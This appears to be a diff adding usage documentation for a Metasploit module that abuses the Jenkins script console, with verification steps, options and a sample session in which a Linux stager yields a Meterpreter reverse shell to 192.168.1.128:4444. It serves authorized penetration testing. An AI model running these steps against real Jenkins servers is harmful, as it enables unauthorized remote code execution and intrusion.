|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | + Jenkins can be downloaded from [jenkins.io](https://jenkins.io/) where |
| 4 | + binaries are available for a variety of operating systems. Both LTS and weekly |
| 5 | + builds are available. |
| 6 | + |
| 7 | + Default settings have the script console enabled and require a valid user |
| 8 | + account on order to access it. A known account can be used with this module by |
| 9 | + setting the `USERNAME` and `PASSWORD` options. |
| 10 | + |
| 11 | +## Verification Steps |
| 12 | + |
| 13 | + Example steps in this format: |
| 14 | + |
| 15 | + 1. Install the application |
| 16 | + 1. Start msfconsole |
| 17 | + 1. Do: ```use exploit/multi/http/jenkins_script_console``` |
| 18 | + 1. Do: ```set RHOST [target host]``` |
| 19 | + 1. Do: ```set TARGET [target id]``` |
| 20 | + 1. Do: ```exploit``` |
| 21 | + 1. You should get a shell. |
| 22 | + |
| 23 | +## Options |
| 24 | + |
| 25 | + **PASSWORD** |
| 26 | + |
| 27 | + A password to an account that has access to the script console. This is only |
| 28 | + necessary if the Jenkins instance has been configured to require |
| 29 | + authentication. |
| 30 | + |
| 31 | + **TARGETURI** |
| 32 | + |
| 33 | + The path to the target instance of Jenkins. |
| 34 | + |
| 35 | + **USERNAME** |
| 36 | + |
| 37 | + A username to an account that has access to the script console. This is only |
| 38 | + necessary if the Jenkins instance has been configured to require |
| 39 | + authentication. |
| 40 | + |
| 41 | +## Scenarios |
| 42 | + |
| 43 | + Example usage against a Linux target server. |
| 44 | + |
| 45 | + ``` |
| 46 | + msf > use exploit/multi/http/jenkins_script_console |
| 47 | + msf exploit(jenkins_script_console) > set RHOST 192.168.1.154 |
| 48 | + msf exploit(jenkins_script_console) > set TARGET 1 |
| 49 | + msf exploit(jenkins_script_console) > exploit |
| 50 | + [*] Reloading module... |
| 51 | +
|
| 52 | + [*] Started reverse handler on 192.168.1.128:4444 |
| 53 | + [*] Checking access to the script console |
| 54 | + [*] No authentication required, skipping login... |
| 55 | + [*] 192.168.1.154:8080 - Sending Linux stager... |
| 56 | + [*] Transmitting intermediate stager for over-sized stage...(100 bytes) |
| 57 | + [*] Sending stage (1126400 bytes) to 192.168.1.154 |
| 58 | + [*] Meterpreter session 12 opened (192.168.1.128:4444 -> 192.168.1.154:46726) at 2013-01-20 13:37:06 +0100 |
| 59 | + [!] Deleting /tmp/IVVrDu payload file |
| 60 | +
|
| 61 | + meterpreter > sysinfo |
| 62 | + Computer : ubuntu |
| 63 | + OS : Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 (i686) |
| 64 | + Architecture : i686 |
| 65 | + Meterpreter : x86/linux |
| 66 | + ``` |
0 commit comments